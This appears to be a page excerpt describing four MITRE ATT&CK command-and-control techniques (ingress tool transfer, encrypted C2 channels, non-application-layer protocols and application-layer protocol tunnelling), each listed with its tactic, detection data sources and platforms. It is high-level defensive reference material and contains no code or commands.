Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre